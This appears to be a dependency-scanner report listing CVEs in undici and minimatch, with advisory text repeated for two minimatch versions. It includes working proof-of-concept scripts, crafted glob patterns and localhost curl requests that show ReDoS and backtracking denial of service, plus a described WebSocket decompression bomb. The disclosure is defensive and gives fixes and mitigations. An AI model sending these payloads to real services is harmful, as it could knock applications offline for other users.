There are no workarounds.

high 7.5: CVE-2026-1526 Improper Handling of Highly Compressed Data (Data Amplification)

Affected range: <6.24.0
Fixed version: 6.24.0
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.067%
EPSS Percentile: 21st percentile
Description

The undici WebSocket client is vulnerable to a denial-of-service attack via unbounded memory consumption during permessage-deflate decompression. When a WebSocket connection negotiates the permessage-deflate extension, the client decompresses incoming compressed frames without enforcing any limit on the decompressed data size. A malicious WebSocket server can send a small compressed frame (a "decompression bomb") that expands to an extremely large size in memory, causing the Node.js process to exhaust available memory and crash or become unresponsive.

The vulnerability exists in the PerMessageDeflate.decompress() method, which accumulates all decompressed chunks in memory and concatenates them into a single Buffer without checking whether the total size exceeds a safe threshold.

Impact

  • Remote denial of service against any Node.js application using undici's WebSocket client
  • A single compressed WebSocket frame of ~6 MB can decompress to ~1 GB or more
  • Memory exhaustion occurs in native/external memory, bypassing V8 heap limits
  • No application-level mitigation is possible as decompression occurs before message delivery

Patches

Users should upgrade to fixed versions.

Workarounds

No workarounds are possible.

critical: 0 high: 3 medium: 0 low: 0 minimatch 10.1.2 (npm)

pkg:npm/minimatch@10.1.2

high 8.7: CVE-2026-26996 Inefficient Regular Expression Complexity

Affected range: >=10.0.0, <10.2.1
Fixed version: 10.2.1
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score: 0.052%
EPSS Percentile: 16th percentile
Description

Summary

minimatch is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.

The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever.

Details

Each * in a glob pattern compiles to its own lazy [^/]*? group in the regex minimatch generates. When the overall match fails, the engine must backtrack through every possible way of splitting the input among those groups, so the work grows exponentially with the number of * wildcards.

PoC

When minimatch compiles a glob pattern, each * becomes [^/]*? in the generated regex. For a pattern like ***************X***:

/^(?!\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/

When the test string doesn't contain X, the regex engine must try every possible way to distribute the characters across all the [^/]*? groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) — exponential.
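The blow-up can be observed against a generated-style regex directly, at a reduced size so it completes quickly (8 lazy groups rather than the 18 of the advisory's example):

```javascript
// Eight [^/]*? groups followed by a literal X the input lacks. The
// engine tries every split of the input across the groups before
// failing; per the advisory's analysis this is C(N+M, N) in the
// number of groups N and input characters M.
const re = /^(?!\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X$/
const matched = re.test('a'.repeat(20))
console.log(matched) // false, after roughly C(28, 8) ≈ 3.1e6 splits
```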

Impact

Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This includes:

  • File search/filter UIs that accept glob patterns
  • .gitignore-style filtering with user-defined rules
  • Build tools that accept glob configuration
  • Any API that exposes glob matching to untrusted input

Thanks to @ljharb for back-porting the fix to legacy versions of minimatch.

high 7.5: CVE-2026-27904 Inefficient Regular Expression Complexity

Affected range: >=10.0.0, <10.2.3
Fixed version: 10.2.3
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.052%
EPSS Percentile: 16th percentile
Description

Summary

Nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally.


Details

The root cause is in AST.toRegExpSource() at src/ast.ts#L598. For the * extglob type, the close token emitted is )* or )?, wrapping the recursive body in (?:...)*. When extglobs are nested, each level adds another * quantifier around the previous group:

: this.type === '*' && bodyDotAllowed ? `)?`
: `)${this.type}`

This produces the following regexps:

Pattern Generated regex
*(a|b) /^(?:a|b)*$/
*(*(a|b)) /^(?:(?:a|b)*)*$/
*(*(*(a|b))) /^(?:(?:(?:a|b)*)*)*$/
*(*(*(*(a|b)))) /^(?:(?:(?:(?:a|b)*)*)*)*$/

These are textbook nested-quantifier patterns. Against an input of repeated a characters followed by a non-matching character z, V8's backtracking engine explores an exponential number of paths before returning false.
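The depth-2 entry from the table can be exercised against the regex engine directly, with an input short enough to return promptly (the timing printed is indicative and machine-dependent):

```javascript
// /^(?:(?:a|b)*)*$/ is the regex shown above for *(*(a|b)). Each extra
// input character roughly doubles the work of a failing match.
const re = /^(?:(?:a|b)*)*$/
const input = 'a'.repeat(22) + 'z' // short enough to finish well under a second

const t0 = process.hrtime.bigint()
const matched = re.test(input)
const ms = Number(process.hrtime.bigint() - t0) / 1e6
console.log(matched, `${ms.toFixed(0)}ms`)
```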

The generated regex is stored on this.set and evaluated inside matchOne() at src/index.ts#L1010 via p.test(f). It is reached through the standard minimatch() call with no configuration.

Measured times via minimatch():

Pattern Input Time
*(*(a|b)) a x30 + z ~68,000ms
*(*(*(a|b))) a x20 + z ~124,000ms
*(*(*(*(a|b)))) a x25 + z ~116,000ms
*(a|a) a x25 + z ~2,000ms

Depth inflection at fixed input a x16 + z:

Depth Pattern Time
1 *(a|b) 0ms
2 *(*(a|b)) 4ms
3 *(*(*(a|b))) 270ms
4 *(*(*(*(a|b)))) 115,000ms

Going from depth 2 to depth 3 with a 20-character input jumps from 66ms to 123,544ms -- a 1,867x increase from a single added nesting level.


PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- verify the generated regexps and timing (standalone script)

Save as poc4-validate.mjs and run with node poc4-validate.mjs:

import { minimatch, Minimatch } from 'minimatch'

function timed(fn) {
  const s = process.hrtime.bigint()
  let result, error
  try { result = fn() } catch(e) { error = e }
  const ms = Number(process.hrtime.bigint() - s) / 1e6
  return { ms, result, error }
}

// Verify generated regexps
for (let depth = 1; depth <= 4; depth++) {
  let pat = 'a|b'
  for (let i = 0; i < depth; i++) pat = `*(${pat})`
  const re = new Minimatch(pat, {}).set?.[0]?.[0]?.toString()
  console.log(`depth=${depth} "${pat}" -> ${re}`)
}
// depth=1 "*(a|b)"          -> /^(?:a|b)*$/
// depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
// depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
// depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/

// Safe-length timing (exponential growth confirmation without multi-minute hang)
const cases = [
  ['*(*(*(a|b)))', 15],   // ~270ms
  ['*(*(*(a|b)))', 17],   // ~800ms
  ['*(*(*(a|b)))', 19],   // ~2400ms
  ['*(*(a|b))',    23],   // ~260ms
  ['*(a|b)',      101],   // <5ms (depth=1 control)
]
for (const [pat, n] of cases) {
  const t = timed(() => minimatch('a'.repeat(n) + 'z', pat))
  console.log(`"${pat}" n=${n}: ${t.ms.toFixed(0)}ms result=${t.result}`)
}

// Confirm noext disables the vulnerability
const t_noext = timed(() => minimatch('a'.repeat(18) + 'z', '*(*(*(a|b)))', { noext: true }))
console.log(`noext=true: ${t_noext.ms.toFixed(0)}ms (should be ~0ms)`)

// +() is equally affected
const t_plus = timed(() => minimatch('a'.repeat(17) + 'z', '+(+(+(a|b)))'))
console.log(`"+(+(+(a|b)))" n=18: ${t_plus.ms.toFixed(0)}ms result=${t_plus.result}`)

Observed output:

depth=1 "*(a|b)"          -> /^(?:a|b)*$/
depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/
"*(*(*(a|b)))" n=15: 269ms result=false
"*(*(*(a|b)))" n=17: 268ms result=false
"*(*(*(a|b)))" n=19: 2408ms result=false
"*(*(a|b))"    n=23: 257ms result=false
"*(a|b)"       n=101: 0ms result=false
noext=true: 0ms (should be ~0ms)
"+(+(+(a|b)))" n=18: 6300ms result=false

Step 2 -- HTTP server (event loop starvation proof)

Save as poc4-server.mjs:

import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3001
http.createServer((req, res) => {
  const url     = new URL(req.url, `http://localhost:${PORT}`)
  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  console.log(`[${new Date().toISOString()}] ${ms.toFixed(0)}ms pattern="${pattern}" path="${path.slice(0,30)}"`)
  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
}).listen(PORT, () => console.log(`listening on ${PORT}`))

Terminal 1 -- start the server:

node poc4-server.mjs

Terminal 2 -- fire the attack (depth=3, 19 a's + z) and return immediately:

curl "http://localhost:3001/match?pattern=*%28*%28*%28a%7Cb%29%29%29&path=aaaaaaaaaaaaaaaaaaaz" &

Terminal 3 -- send a benign request while the attack is in-flight:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3001/match?pattern=*%28a%7Cb%29&path=aaaz"

Observed output -- Terminal 2 (attack):

{"result":false,"ms":"64149"}

Observed output -- Terminal 3 (benign, concurrent):

{"result":false,"ms":"0"}

time_total: 63.022047s

Terminal 1 (server log):

[2026-02-20T09:41:17.624Z] pattern="*(*(*(a|b)))" path="aaaaaaaaaaaaaaaaaaaz"
[2026-02-20T09:42:21.775Z] done in 64149ms result=false
[2026-02-20T09:42:21.779Z] pattern="*(a|b)" path="aaaz"
[2026-02-20T09:42:21.779Z] done in 0ms result=false

The server reports "ms":"0" for the benign request -- the legitimate request itself requires no CPU time. The entire 63-second time_total is time spent waiting for the event loop to be released. The benign request was only dispatched after the attack completed, confirmed by the server log timestamps.

Note: standalone script timing (~7s at n=19) is lower than server timing (64s) because the standalone script had warmed up V8's JIT through earlier sequential calls. A cold server hits the worst case. Both measurements confirm catastrophic backtracking -- the server result is the more realistic figure for production impact.


Impact

Any context where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments, multi-tenant platforms where users configure glob-based rules (file filters, ignore lists, include patterns), and CI/CD pipelines that evaluate user-submitted config files containing glob expressions. No evidence was found of production HTTP servers passing raw user input directly as the extglob pattern, so that framing is not claimed here.

Depth 3 (*(*(*(a|b))), 12 bytes) stalls the Node.js event loop for 7+ seconds with an 18-character input. Depth 2 (*(*(a|b)), 9 bytes) reaches 68 seconds with a 31-character input. Both the pattern and the input fit in a query string or JSON body without triggering the 64 KB length guard.

+() extglobs share the same code path and produce equivalent worst-case behavior (6.3 seconds at depth=3 with an 18-character input, confirmed).

Mitigation available: passing { noext: true } to minimatch() disables extglob processing entirely and reduces the same input to 0ms. Applications that do not need extglob syntax should set this option when handling untrusted patterns.

high 7.5: CVE-2026-27903 Inefficient Algorithmic Complexity

Affected range: >=10.0.0, <10.2.3
Fixed version: 10.2.3
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.054%
EPSS Percentile: 16th percentile
Description

Summary

matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior.


Details

The vulnerable loop is in matchOne() at src/index.ts#L960:

while (fr < fl) {
  ..
  if (this.matchOne(file.slice(fr), pattern.slice(pr), partial)) {
    ..
    return true
  }
  ..
  fr++
}

When a GLOBSTAR is encountered, the function tries to match the remaining pattern against every suffix of the remaining file segments. Each ** multiplies the number of recursive calls by the number of remaining segments. With k non-adjacent globstars and n file segments, the total number of calls is C(n, k).

There is no depth counter, visited-state cache, or budget limit applied to this recursion. The call tree is fully explored before returning false on a non-matching input.

Measured timing with n=30 path segments:

k (globstars) Pattern size Time
7 36 bytes ~154ms
9 46 bytes ~1.2s
11 56 bytes ~5.4s
12 61 bytes ~9.7s
13 66 bytes ~15.9s
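The C(n, k) growth behind these timings can be checked with a direct binomial computation (the call counts below are the theoretical worst case, not measured numbers):

```javascript
// Worst-case number of matchOne() invocations for n path segments and
// k non-adjacent globstars, per the C(n, k) analysis above.
function binom(n, k) {
  let r = 1
  for (let i = 1; i <= k; i++) r = (r * (n - k + i)) / i
  return Math.round(r)
}

for (const k of [7, 9, 11, 13]) {
  console.log(`k=${k}: ~${binom(30, k).toLocaleString('en-US')} calls`)
}
```

The ratio binom(30, 11) / binom(30, 7) is about 27, in the same ballpark as the measured jump from ~154ms to ~5.4s.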

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- inline script

import { minimatch } from 'minimatch'

// k=9 globstars, n=30 path segments
// pattern: 46 bytes, default options
const pattern = '**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/b'
const path    = 'a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a'

const start = Date.now()
minimatch(path, pattern)
console.log(Date.now() - start + 'ms') // ~1200ms

To scale the effect, increase k:

// k=11 -> ~5.4s, k=13 -> ~15.9s
const k = 11
const pattern = Array.from({ length: k }, () => '**/a').join('/') + '/b'
const path    = Array(30).fill('a').join('/')
minimatch(path, pattern)

No special options are required. This reproduces with the default minimatch() call.

Step 2 -- HTTP server (event loop starvation proof)

The following server demonstrates the event loop starvation effect. It is a minimal harness, not a claim that this exact deployment pattern is common:

// poc1-server.mjs
import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3000

const server = http.createServer((req, res) => {
  const url = new URL(req.url, `http://localhost:${PORT}`)
  if (url.pathname !== '/match') { res.writeHead(404); res.end(); return }

  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
})

server.listen(PORT)

Terminal 1 -- start the server:

node poc1-server.mjs

Terminal 2 -- send the attack request (k=11, ~5s stall) and immediately return to shell:

curl "http://localhost:3000/match?pattern=**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2Fb&path=a%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa" &

Terminal 3 -- while the attack is in-flight, send a benign request:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3000/match?pattern=**%2Fy%2Fz&path=x%2Fy%2Fz"

Observed output (Terminal 3):

{"result":true,"ms":"0"}

time_total: 4.132709s

The server reports "ms":"0" -- the legitimate request itself takes zero processing time. The 4+ second time_total is entirely time spent waiting for the event loop to be released by the attack request. Every concurrent user is blocked for the full duration of each attack call. Repeating the benign request while no attack is in-flight confirms the baseline:

{"result":true,"ms":"0"}

time_total: 0.001599s

Impact

Any application where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature.

critical: 0 high: 3 medium: 0 low: 0 minimatch 9.0.5 (npm)

pkg:npm/minimatch@9.0.5

high 8.7: CVE-2026-26996 Inefficient Regular Expression Complexity

Affected range: >=9.0.0, <9.0.6
Fixed version: 10.2.1
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score: 0.052%
EPSS Percentile: 16th percentile
Description

Summary

minimatch is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.

The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever.

Details

Each * in a glob pattern compiles to its own lazy [^/]*? group in the regex minimatch generates. When the overall match fails, the engine must backtrack through every possible way of splitting the input among those groups, so the work grows exponentially with the number of * wildcards.

PoC

When minimatch compiles a glob pattern, each * becomes [^/]*? in the generated regex. For a pattern like ***************X***:

/^(?!\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/

When the test string doesn't contain X, the regex engine must try every possible way to distribute the characters across all the [^/]*? groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) — exponential.

Impact

Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This includes:

  • File search/filter UIs that accept glob patterns
  • .gitignore-style filtering with user-defined rules
  • Build tools that accept glob configuration
  • Any API that exposes glob matching to untrusted input

Thanks to @ljharb for back-porting the fix to legacy versions of minimatch.

high 7.5: CVE-2026-27904 Inefficient Regular Expression Complexity

Affected range: >=9.0.0, <9.0.7
Fixed version: 9.0.7
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.052%
EPSS Percentile: 16th percentile
Description

Summary

Nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally.


Details

The root cause is in AST.toRegExpSource() at src/ast.ts#L598. For the * extglob type, the close token emitted is )* or )?, wrapping the recursive body in (?:...)*. When extglobs are nested, each level adds another * quantifier around the previous group:

: this.type === '*' && bodyDotAllowed ? `)?`
: `)${this.type}`

This produces the following regexps:

Pattern Generated regex
*(a|b) /^(?:a|b)*$/
*(*(a|b)) /^(?:(?:a|b)*)*$/
*(*(*(a|b))) /^(?:(?:(?:a|b)*)*)*$/
*(*(*(*(a|b)))) /^(?:(?:(?:(?:a|b)*)*)*)*$/

These are textbook nested-quantifier patterns. Against an input of repeated a characters followed by a non-matching character z, V8's backtracking engine explores an exponential number of paths before returning false.

The generated regex is stored on this.set and evaluated inside matchOne() at src/index.ts#L1010 via p.test(f). It is reached through the standard minimatch() call with no configuration.

Measured times via minimatch():

Pattern Input Time
*(*(a|b)) a x30 + z ~68,000ms
*(*(*(a|b))) a x20 + z ~124,000ms
*(*(*(*(a|b)))) a x25 + z ~116,000ms
*(a|a) a x25 + z ~2,000ms

Depth inflection at fixed input a x16 + z:

Depth Pattern Time
1 *(a|b) 0ms
2 *(*(a|b)) 4ms
3 *(*(*(a|b))) 270ms
4 *(*(*(*(a|b)))) 115,000ms

Going from depth 2 to depth 3 with a 20-character input jumps from 66ms to 123,544ms -- a 1,867x increase from a single added nesting level.


PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- verify the generated regexps and timing (standalone script)

Save as poc4-validate.mjs and run with node poc4-validate.mjs:

import { minimatch, Minimatch } from 'minimatch'

function timed(fn) {
  const s = process.hrtime.bigint()
  let result, error
  try { result = fn() } catch(e) { error = e }
  const ms = Number(process.hrtime.bigint() - s) / 1e6
  return { ms, result, error }
}

// Verify generated regexps
for (let depth = 1; depth <= 4; depth++) {
  let pat = 'a|b'
  for (let i = 0; i < depth; i++) pat = `*(${pat})`
  const re = new Minimatch(pat, {}).set?.[0]?.[0]?.toString()
  console.log(`depth=${depth} "${pat}" -> ${re}`)
}
// depth=1 "*(a|b)"          -> /^(?:a|b)*$/
// depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
// depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
// depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/

// Safe-length timing (exponential growth confirmation without multi-minute hang)
const cases = [
  ['*(*(*(a|b)))', 15],   // ~270ms
  ['*(*(*(a|b)))', 17],   // ~800ms
  ['*(*(*(a|b)))', 19],   // ~2400ms
  ['*(*(a|b))',    23],   // ~260ms
  ['*(a|b)',      101],   // <5ms (depth=1 control)
]
for (const [pat, n] of cases) {
  const t = timed(() => minimatch('a'.repeat(n) + 'z', pat))
  console.log(`"${pat}" n=${n}: ${t.ms.toFixed(0)}ms result=${t.result}`)
}

// Confirm noext disables the vulnerability
const t_noext = timed(() => minimatch('a'.repeat(18) + 'z', '*(*(*(a|b)))', { noext: true }))
console.log(`noext=true: ${t_noext.ms.toFixed(0)}ms (should be ~0ms)`)

// +() is equally affected
const t_plus = timed(() => minimatch('a'.repeat(17) + 'z', '+(+(+(a|b)))'))
console.log(`"+(+(+(a|b)))" n=18: ${t_plus.ms.toFixed(0)}ms result=${t_plus.result}`)

Observed output:

depth=1 "*(a|b)"          -> /^(?:a|b)*$/
depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/
"*(*(*(a|b)))" n=15: 269ms result=false
"*(*(*(a|b)))" n=17: 268ms result=false
"*(*(*(a|b)))" n=19: 2408ms result=false
"*(*(a|b))"    n=23: 257ms result=false
"*(a|b)"       n=101: 0ms result=false
noext=true: 0ms (should be ~0ms)
"+(+(+(a|b)))" n=18: 6300ms result=false

Step 2 -- HTTP server (event loop starvation proof)

Save as poc4-server.mjs:

import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3001
http.createServer((req, res) => {
  const url     = new URL(req.url, `http://localhost:${PORT}`)
  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  console.log(`[${new Date().toISOString()}] ${ms.toFixed(0)}ms pattern="${pattern}" path="${path.slice(0,30)}"`)
  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
}).listen(PORT, () => console.log(`listening on ${PORT}`))

Terminal 1 -- start the server:

node poc4-server.mjs

Terminal 2 -- fire the attack (depth=3, 19 a's + z) and return immediately:

curl "http://localhost:3001/match?pattern=*%28*%28*%28a%7Cb%29%29%29&path=aaaaaaaaaaaaaaaaaaaz" &

Terminal 3 -- send a benign request while the attack is in-flight:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3001/match?pattern=*%28a%7Cb%29&path=aaaz"

Observed output -- Terminal 2 (attack):

{"result":false,"ms":"64149"}

Observed output -- Terminal 3 (benign, concurrent):

{"result":false,"ms":"0"}

time_total: 63.022047s

Terminal 1 (server log):

[2026-02-20T09:41:17.624Z] pattern="*(*(*(a|b)))" path="aaaaaaaaaaaaaaaaaaaz"
[2026-02-20T09:42:21.775Z] done in 64149ms result=false
[2026-02-20T09:42:21.779Z] pattern="*(a|b)" path="aaaz"
[2026-02-20T09:42:21.779Z] done in 0ms result=false

The server reports "ms":"0" for the benign request -- the legitimate request itself requires no CPU time. The entire 63-second time_total is time spent waiting for the event loop to be released. The benign request was only dispatched after the attack completed, confirmed by the server log timestamps.

Note: standalone script timing (~7s at n=19) is lower than server timing (64s) because the standalone script had warmed up V8's JIT through earlier sequential calls. A cold server hits the worst case. Both measurements confirm catastrophic backtracking -- the server result is the more realistic figure for production impact.


Impact

Any context where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments, multi-tenant platforms where users configure glob-based rules (file filters, ignore lists, include patterns), and CI/CD pipelines that evaluate user-submitted config files containing glob expressions. No evidence was found of production HTTP servers passing raw user input directly as the extglob pattern, so that framing is not claimed here.

Depth 3 (*(*(*(a|b))), 12 bytes) stalls the Node.js event loop for 7+ seconds with an 18-character input. Depth 2 (*(*(a|b)), 9 bytes) reaches 68 seconds with a 31-character input. Both the pattern and the input fit in a query string or JSON body without triggering the 64 KB length guard.

+() extglobs share the same code path and produce equivalent worst-case behavior (6.3 seconds at depth=3 with an 18-character input, confirmed).

Mitigation available: passing { noext: true } to minimatch() disables extglob processing entirely and reduces the same input to 0ms. Applications that do not need extglob syntax should set this option when handling untrusted patterns.

high 7.5: CVE-2026-27903 Inefficient Algorithmic Complexity

Affected range: >=9.0.0, <9.0.7
Fixed version: 9.0.7
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.054%
EPSS Percentile: 16th percentile
Description

Summary

matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior.


Details

The vulnerable loop is in matchOne() at src/index.ts#L960:

while (fr < fl) {
  ..
  if (this.matchOne(file.slice(fr), pattern.slice(pr), partial)) {
    ..
    return true
  }
  ..
  fr++
}

When a GLOBSTAR is encountered, the function tries to match the remaining pattern against every suffix of the remaining file segments. Each ** multiplies the number of recursive calls by the number of remaining segments. With k non-adjacent globstars and n file segments, the total number of calls is C(n, k).

There is no depth counter, visited-state cache, or budget limit applied to this recursion. The call tree is fully explored before returning false on a non-matching input.

Measured timing with n=30 path segments:

k (globstars) Pattern size Time
7 36 bytes ~154ms
9 46 bytes ~1.2s
11 56 bytes ~5.4s
12 61 bytes ~9.7s
13 66 bytes ~15.9s

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- inline script

import { minimatch } from 'minimatch'

// k=9 globstars, n=30 path segments
// pattern: 46 bytes, default options
const pattern = '**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/b'
const path    = 'a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a'

const start = Date.now()
minimatch(path, pattern)
console.log(Date.now() - start + 'ms') // ~1200ms

To scale the effect, increase k:

// k=11 -> ~5.4s, k=13 -> ~15.9s
const k = 11
const pattern = Array.from({ length: k }, () => '**/a').join('/') + '/b'
const path    = Array(30).fill('a').join('/')
minimatch(path, pattern)

No special options are required. This reproduces with the default minimatch() call.

Step 2 -- HTTP server (event loop starvation proof)

The following server demonstrates the event loop starvation effect. It is a minimal harness, not a claim that this exact deployment pattern is common:

// poc1-server.mjs
import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3000

const server = http.createServer((req, res) => {
  const url = new URL(req.url, `http://localhost:${PORT}`)
  if (url.pathname !== '/match') { res.writeHead(404); res.end(); return }

  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
})

server.listen(PORT)

Terminal 1 -- start the server:

node poc1-server.mjs

Terminal 2 -- send the attack request (k=11, ~5s stall) and immediately return to shell:

curl "http://localhost:3000/match?pattern=**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2Fb&path=a%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa" &

Terminal 3 -- while the attack is in-flight, send a benign request:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3000/match?pattern=**%2Fy%2Fz&path=x%2Fy%2Fz"

Observed output (Terminal 3):

